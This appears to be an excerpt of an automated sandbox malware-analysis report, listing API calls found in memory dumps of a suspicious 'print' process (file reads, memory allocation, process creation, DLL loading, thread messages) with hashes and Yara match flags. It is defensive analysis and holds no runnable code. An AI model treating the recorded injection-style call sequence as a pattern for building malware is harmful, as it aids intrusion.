                                  • Opcode ID: 0c373e7cd66555538179ca18aef6187c55962fb60ae2fba02d5c11a5297a2cf7
                                  • Instruction ID: c860b42877bce66a60dc02b3567f6e5e8627865aabe497dca61c69bd4ce7a0e6
                                  • Opcode Fuzzy Hash: 0c373e7cd66555538179ca18aef6187c55962fb60ae2fba02d5c11a5297a2cf7
                                  • Instruction Fuzzy Hash: CB21D0B6201509BBDB54DF99DC81EEB73ADAF8C708F00820DFA1993241D634F8518BA4
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004C4F4E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: beeaa75b1d5447f27a47e20113100ee912b871afdac0aa22d530aae0ee6485ba
                                  • Instruction ID: 0e960bd12df382426b4e2171bca940f0bd6140a4a80ca9e0bdf7d4c19e90bd7a
                                  • Opcode Fuzzy Hash: beeaa75b1d5447f27a47e20113100ee912b871afdac0aa22d530aae0ee6485ba
                                  • Instruction Fuzzy Hash: F421F3B6200609AFDB14DF99DC81EEB77ADEF8D714F00860DFA1993241D634B9128BA4
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(004B18E8,?,004B1FF9,00000000,00000004,00003000,00000004,00000000,004B1FF9,?,004B18E8,004B1FF9,?), ref: 004C51A9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 1a67ab1836375b546c2c5e2ab39391adde4e56a3c2c37fd5eb48285c553b542c
                                  • Instruction ID: 02d629dc299daf5a1fcf8a273fc72d3ea2fe81c2e2249a1e9ffeeeb2a5883f98
                                  • Opcode Fuzzy Hash: 1a67ab1836375b546c2c5e2ab39391adde4e56a3c2c37fd5eb48285c553b542c
                                  • Instruction Fuzzy Hash: 6D1116B6200609BBDB14DE99DC81EEB77ADEF89754F00850DFA1897241D634B8128BB5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: e83a1e60ced51bf3164f2c9967d0c803f9679a61701b503ed07fc5bc142cd961
                                  • Instruction ID: d2a972aac6c9dea9ca00e74a86bb580b5ef41eec6820744e42d8952e54d440b7
                                  • Opcode Fuzzy Hash: e83a1e60ced51bf3164f2c9967d0c803f9679a61701b503ed07fc5bc142cd961
                                  • Instruction Fuzzy Hash: 4B01AD752016007BD220E66A8C01FAB776CEFC9318F00841EFA1897242D634790187B9
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004C5017
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction ID: 52335cc793a517bd936f4466570dd24a8086df7b33313d6b394964a8b5e28e8f
                                  • Opcode Fuzzy Hash: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction Fuzzy Hash: 3DE04F356006047BD220FA5ACC01FAB776CDBC5754F408419FA4867241CE75B91187F4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0e31fe97e8f6e5179ac03a79477459e1ca552eb1ff42c15d950e03935ac15d1b
                                  • Instruction ID: 32e3ef392246cd0e645b93adb5d14338b3fb55a86cf6a5c5b105b18277555d40
                                  • Opcode Fuzzy Hash: 0e31fe97e8f6e5179ac03a79477459e1ca552eb1ff42c15d950e03935ac15d1b
                                  • Instruction Fuzzy Hash: 41900231645804129580B15848C5547400697E0301B95D051E48A4558C8A248A569361
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: e038637b64fd7fe978c5397ce8ec1635554fa7228557eb9eacc14ec4479ba474
                                  • Instruction ID: e607a43eab769f6d2fb08bc52550c89d24865d61d2b7433ea6eae84e0596c60d
                                  • Opcode Fuzzy Hash: e038637b64fd7fe978c5397ce8ec1635554fa7228557eb9eacc14ec4479ba474
                                  • Instruction Fuzzy Hash: C7E1C3B5900208ABDB24DFA5CC91FEF77B8AF44304F54815FE509A6241E778AB44CBB9
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: #$y14291878$y14291878
                                  • API String ID: 1836367815-3963701365
                                  • Opcode ID: 192abf325b3ea21824b377f06d93f79007e6aae840d08c78804be79fbfe80f49
                                  • Instruction ID: c51a10784244c5991d5aeec606698c113069ec7ae89de7b482a900956b390073
                                  • Opcode Fuzzy Hash: 192abf325b3ea21824b377f06d93f79007e6aae840d08c78804be79fbfe80f49
                                  • Instruction Fuzzy Hash: 9D115CB6D0821876EB20A9A15C42FEFB76C9B41751F14406AF500FB242DA78A9034BF9
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 5e8196c960923dd45be43cdba9af6da37779855a69d1a5b22b4ea6941ef301e3
                                  • Instruction ID: 7b2c7aea0c096980cabe1bea29030cd1b9c2c0ea7952973939216ce2abd32ecf
                                  • Opcode Fuzzy Hash: 5e8196c960923dd45be43cdba9af6da37779855a69d1a5b22b4ea6941ef301e3
                                  • Instruction Fuzzy Hash: 3A112B75D4031C76EB21AB928C02FDFBB7C8F45B54F15805AFA047B281D6786A068BF9
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 1caf40d980aa9fb1f68732b398c9d702392ef72b49a24ab96c18859571f864a8
                                  • Instruction ID: 4c8dc570f0398edfd8e0dbe75f4f76650e0c4d38e780e892924c35aa67f75ed4
                                  • Opcode Fuzzy Hash: 1caf40d980aa9fb1f68732b398c9d702392ef72b49a24ab96c18859571f864a8
                                  • Instruction Fuzzy Hash: 27019B75D4031C76EB11A6928C02FDF7B7C9F45B54F14805AFA047B281D6785A068BF9
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 9edccf1f84105b80908487fe7ef6a8665fed385207208b02fd0a59c6b8d29bec
                                  • Instruction ID: b4dc1ea492ed963d23a0bfd79edc8d3586037776653f981fcc2199c10e9450f6
                                  • Opcode Fuzzy Hash: 9edccf1f84105b80908487fe7ef6a8665fed385207208b02fd0a59c6b8d29bec
                                  • Instruction Fuzzy Hash: 093144B5640705ABC714DF75D881FAABBB8BF84304F10C16FE9494B246D7B8A941CB98
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 1a7fc33de45ecd14281b2a99dff2042c2476312378d1dfd0dcb3a07c3e5af08c
                                  • Instruction ID: 958ac651e400757a7d0ffd286cdc147a48c3ac02a3f79ca2435bf894c09da2ed
                                  • Opcode Fuzzy Hash: 1a7fc33de45ecd14281b2a99dff2042c2476312378d1dfd0dcb3a07c3e5af08c
                                  • Instruction Fuzzy Hash: FA31A0B9600704ABC314DFB5DC81FA7B7B8AB88704F00852EE9595B245D7B8A9458BA4
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: ec5168f086ebaccb2d6c210d625b24ec537f46d9780a6ead5633f213c5100785
                                  • Instruction ID: 8fc2dd85610ec4c81e0013410472624fdfdc760997a6587fca94214af21191bd
                                  • Opcode Fuzzy Hash: ec5168f086ebaccb2d6c210d625b24ec537f46d9780a6ead5633f213c5100785
                                  • Instruction Fuzzy Hash: 323134B8600701ABD314DFB5DC86FA7BBB8FF44304F10856EE9495B242D3B8A901CB98
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 004B8AB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID: @
                                  • API String ID: 3188754299-2766056989
                                  • Opcode ID: 84994f8e6e76c4317007dac4bd0581fd0bc53c74b269bd43de313a015885e149
                                  • Instruction ID: a7ff89f89cae5b447d415dff4b4f561acb67b18cbd6a1cf64a389f2caed9c02b
                                  • Opcode Fuzzy Hash: 84994f8e6e76c4317007dac4bd0581fd0bc53c74b269bd43de313a015885e149
                                  • Instruction Fuzzy Hash: 8F7180B6900208ABDB24EB65CCC5FEBB3BCBF54304F04459EB51997141EB78AB84CB65
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: O.K
                                  • API String ID: 3298025750-1854833371
                                  • Opcode ID: 4b5aa64f5ba4c3c612b9a5cd7c0330bcd3d668e977d563ee96dec5fbc15f857a
                                  • Instruction ID: 71921602681f446505e544c89e0960fdc4e9559ae7af4e4d7be4abe756b82167
                                  • Opcode Fuzzy Hash: 4b5aa64f5ba4c3c612b9a5cd7c0330bcd3d668e977d563ee96dec5fbc15f857a
                                  • Instruction Fuzzy Hash: 56E0A9766402047BD614DE68DC45FEB3BACEFC9304F00441DF919A7246C630B91287B4
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: O.K
                                  • API String ID: 3298025750-1854833371
                                  • Opcode ID: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction ID: 5acd8fd2f31cbae66c8582bb874996a42d44f06ad90c48d3a33471eefa9ed942
                                  • Opcode Fuzzy Hash: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction Fuzzy Hash: 52E06D756003097BD614EE59DC41FEB37ACEF89714F004419F908A7245CA30B91287B8
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004BE357
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 92b3656de57ae04be54b36e53e04bb6ec684fd44637c409875d14d218ac1d68b
                                  • Instruction ID: c53a5bc3eb8738747412fac498ea0c650fd957e97ebf82f043f06f03e3a3bb2d
                                  • Opcode Fuzzy Hash: 92b3656de57ae04be54b36e53e04bb6ec684fd44637c409875d14d218ac1d68b
                                  • Instruction Fuzzy Hash: 11313CB5A0020A9FDB00DFD9D880DEFB7B9FF88304B108559E516AB214D775EE058BA4
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004BE357
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 42644eb9cb8a97c7a2562cfbd1a9ec628bef68d335092513e298bc299c2a7cd0
                                  • Instruction ID: cdcb24d924fb52eca670523cca819651da710bc616e40db27bc19ae720c2878f
                                  • Opcode Fuzzy Hash: 42644eb9cb8a97c7a2562cfbd1a9ec628bef68d335092513e298bc299c2a7cd0
                                  • Instruction Fuzzy Hash: AF314FB5A0020A9FDB00DFD9C8809EFB7B9FF88304B108559E505AB204D775EE058BA4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(004B1DB6,?,004C368D,004B1DB6,004C3387,004C368D,?,004B1DB6,004C3387,00001000,?,?,004C6AB0), ref: 004C52DC
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateFree
                                  • String ID:
                                  • API String ID: 2488874121-0
                                  • Opcode ID: cc79cb5720d16c866006725d92432473df268cde86e9717ad7832cb281e242da
                                  • Instruction ID: 524133fa7a2e91e050cf4cee1d867e1b1ec6775a08d8ec237242df602ef074bf
                                  • Opcode Fuzzy Hash: cc79cb5720d16c866006725d92432473df268cde86e9717ad7832cb281e242da
                                  • Instruction Fuzzy Hash: 52018F75600304ABDA14EE59EC45EEF37ACEFC8314F00841DFD1897201D631B82086B8
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(004B0C30,004B0C58,004B0A30,00000000,004B7403,00000010,004B0C58,?,?,00000044,004B0C58,00000010,004B7403,00000000,004B0A30,004B0C58), ref: 004C53DF
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: be8fd82fbb9b57d5ed4d0eb12e4f3fac554820af14e744186c5af2f15f39826a
                                  • Instruction ID: bce22b37ff480ccf8fd684e4ba652ebaf839ede6901950263c4c295f08f9dcc8
                                  • Opcode Fuzzy Hash: be8fd82fbb9b57d5ed4d0eb12e4f3fac554820af14e744186c5af2f15f39826a
                                  • Instruction Fuzzy Hash: 4501D0B2200209BBCB54DE89DC81EEB37ADAF8C754F50810DFA1897251C630EC528BA4
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004B3FD2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction ID: 055184f6919f2667a063b7b8d0a67837edc1719825f0e79d77f133f735461327
                                  • Opcode Fuzzy Hash: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction Fuzzy Hash: BC011EB9E0020DABDF10DAA5DC42FEEB7789B54308F00419AF90897241F635EB188BA5
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(004B0C30,004B0C58,004B0A30,00000000,004B7403,00000010,004B0C58,?,?,00000044,004B0C58,00000010,004B7403,00000000,004B0A30,004B0C58), ref: 004C53DF
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: df6cb25baf8e528ad07d615df7d097839871c99748219ac17daafc1e2249a330
                                  • Instruction ID: 916dd60f8da0b6e277148462ab4ad65cf8f224003778e4c0d958df8e3e790ba2
                                  • Opcode Fuzzy Hash: df6cb25baf8e528ad07d615df7d097839871c99748219ac17daafc1e2249a330
                                  • Instruction Fuzzy Hash: 9601D2B2200208BBCB54DE89DC81EEB77ADAF8C714F518109BA0CE3245D630FC518BA4
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,004B188A,004B1FF9,004C3387,00000000), ref: 004B7281
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 44ce567384fe842da9dc7ce04356af8bda112395332fccdb5fd454a01764cf7d
                                  • Instruction ID: e738bb85bc6e4e53793b4664f2379133326e98fb9d80cf27159d6e4c2208137e
                                  • Opcode Fuzzy Hash: 44ce567384fe842da9dc7ce04356af8bda112395332fccdb5fd454a01764cf7d
                                  • Instruction Fuzzy Hash: C601A2B9A002056BEB50A7E5DC46F6A37A89B48309F01458AF9089B342D579E9408B6D
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A98A2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 1c5dec91a4bfc04bf35926f0779c9329ac47ed7f2b7136fd89576935e0307051
                                  • Instruction ID: 4e5002ea02b988f67f820a1051df6f4a2d9b9af0209f8c773a9015b7076a5b04
                                  • Opcode Fuzzy Hash: 1c5dec91a4bfc04bf35926f0779c9329ac47ed7f2b7136fd89576935e0307051
                                  • Instruction Fuzzy Hash: 14F065773807043AE22065AE9C02F97779CDB85BA5F15042EF74DDB5C1D89AF80146E8
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A98A2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: c7e59920372728439286e3b1ee68b7fc45f5854e7f8d27ffe96bf63a858e39e6
                                  • Instruction ID: 9607a4358b7028ebe5bf37019acbfe773587daad7181e64a6c3ae194ede22645
                                  • Opcode Fuzzy Hash: c7e59920372728439286e3b1ee68b7fc45f5854e7f8d27ffe96bf63a858e39e6
                                  • Instruction Fuzzy Hash: A1E092766807043AE230759E8C03F977A9C8F95B95F15041EF749EB2C1E9AAF80147E8
                                  APIs
                                  • RtlAllocateHeap.NTDLL(004B1DB6,?,004C368D,004B1DB6,004C3387,004C368D,?,004B1DB6,004C3387,00001000,?,?,004C6AB0), ref: 004C52DC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction ID: 43b6299d06c8b83dd374762331559cfdabef8d16a1b87a97d190d1d559d2848b
                                  • Opcode Fuzzy Hash: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction Fuzzy Hash: 29E06576200308BBD614EE99DC45FEB77ACEFC9714F004419F908A7242CA30B8108BB8
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 004B746A
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 8d2906bbc91a53e1c87f5abb34116fd128d0205bad16ffdb7b6214b9d03fa410
                                  • Instruction ID: 657b6b7db37ee7a1e7f290865754dfa1ecde843115e08585fdbf85862fb61830
                                  • Opcode Fuzzy Hash: 8d2906bbc91a53e1c87f5abb34116fd128d0205bad16ffdb7b6214b9d03fa410
                                  • Instruction Fuzzy Hash: 10E0DFB12402042BEA2066AC9C42FA7334C8B8C724F084651F85C8B2D3D138F8014568
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,004B188A,004B1FF9,004C3387,00000000), ref: 004B7281
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: fb7a33cec1d39ce195ad21a52201164bf4f421547d8ea323c53712181d85e884
                                  • Instruction ID: 3327df917a3e8ed1975498c447d951e2e8ad192b055eccb589f68294c3cc27d6
                                  • Opcode Fuzzy Hash: fb7a33cec1d39ce195ad21a52201164bf4f421547d8ea323c53712181d85e884
                                  • Instruction Fuzzy Hash: 8DD05EB5A403043BF650A6EA9C03F5A368C8B88759F058059F908D73C3D86DF5004A69
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                  • Instruction ID: 7d1ed4588080eb7725c4eca6e90640f20d5bb3284c9a405960a42779ec48885f
                                  • Opcode Fuzzy Hash: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                  • Instruction Fuzzy Hash: 27B09B719415C5C5DE51F7604A09717790567D0705F55D061D7470645E4738C1D1F175
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1331a14fed96d572056bc11e8ed8391b251be653cf7280d6f7089aec77952925
                                  • Instruction ID: ea1a2265ce2fba0c80448801cf1beedfeef6ea6c341a22022af8d79b0df8fdcb
                                  • Opcode Fuzzy Hash: 1331a14fed96d572056bc11e8ed8391b251be653cf7280d6f7089aec77952925
                                  • Instruction Fuzzy Hash: 0E41B370918B0D4FC368BF6890816BBB7E2FB95300F50466DD98AC3652EBB4E8468785
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
